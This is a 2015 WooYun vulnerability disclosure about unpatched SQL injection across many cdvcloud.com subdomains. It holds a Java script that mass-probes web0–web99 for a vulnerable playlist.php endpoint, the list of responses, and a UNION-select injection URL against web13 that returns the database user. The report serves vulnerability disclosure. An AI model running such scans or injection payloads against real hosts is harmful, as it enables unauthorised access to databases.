乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-23: 厂商已经确认,细节仅向厂商公开 2015-10-03: 细节向核心白帽子及相关领域专家公开 2015-10-13: 细节向普通白帽子公开 2015-10-23: 细节向实习白帽子公开 2015-11-07: 细节向公众公开
*
看到之前的这个漏洞
WooYun: 云视某处SQL注入导致后台getshell
只修复了web2,其他地址都没修复于是修改了下地址发现原来子域很多这样的站,貌似是客户的站吧,然后统一管理. 于是写了JAVA小脚本批量下了:
import java.net.*;public class 批量查询网页打开状态 { InetAddress myIPaddress=null; static InetAddress myServer=null; /** * @param args */ public static void main(String[] args) { for (int i = 0; i < 100; i++) { String url="http://web"+i+".cdvcloud.com/e/extend/live/playlist.php?id=1"; httpcode(url); } } /** * 批量获取HTTP响应 * @param surl */ public static void httpcode(String surl){ try { URL url = new URL(surl); URLConnection rulConnection = url.openConnection(); HttpURLConnection httpUrlConnection = (HttpURLConnection) rulConnection; httpUrlConnection.setConnectTimeout(300000); httpUrlConnection.setReadTimeout(300000); httpUrlConnection.connect(); String code = new Integer(httpUrlConnection.getResponseCode()).toString(); String message = httpUrlConnection.getResponseMessage(); System.out.println( code); if(!code.startsWith("2")){ throw new Exception("ResponseCode is not begin with 2,code="+code); } String ipurl=surl.split("http://")[1].toString(); System.out.println(surl+" "+code); }catch(Exception ex){ System.out.println(surl+" "+"无法访问"); } } }
得到可访问地址:
404http://web0.cdvcloud.com/e/extend/live/playlist.php?id=1 无法访问404http://web1.cdvcloud.com/e/extend/live/playlist.php?id=1 无法访问200http://web2.cdvcloud.com/e/extend/live/playlist.php?id=1 200200http://web3.cdvcloud.com/e/extend/live/playlist.php?id=1 200200http://web4.cdvcloud.com/e/extend/live/playlist.php?id=1 200200http://web5.cdvcloud.com/e/extend/live/playlist.php?id=1 200200http://web6.cdvcloud.com/e/extend/live/playlist.php?id=1 200200http://web7.cdvcloud.com/e/extend/live/playlist.php?id=1 200http://web8.cdvcloud.com/e/extend/live/playlist.php?id=1 无法访问200http://web9.cdvcloud.com/e/extend/live/playlist.php?id=1 200200http://web10.cdvcloud.com/e/extend/live/playlist.php?id=1 200200http://web11.cdvcloud.com/e/extend/live/playlist.php?id=1 200200http://web12.cdvcloud.com/e/extend/live/playlist.php?id=1 200200http://web13.cdvcloud.com/e/extend/live/playlist.php?id=1 200200http://web14.cdvcloud.com/e/extend/live/playlist.php?id=1 200
以web13为例手注一下:
http://web13.cdvcloud.com/e/extend/live/playlist.php?id=1%20and%201=2%20union%20select%201,2,3,user(),5,6
直接爆数据库:
document.write('08:00 root@localhost');
其他的都同样存在该问题.
**
危害等级:低
漏洞Rank:5
确认时间:2015-09-23 16:11
测试系统
暂无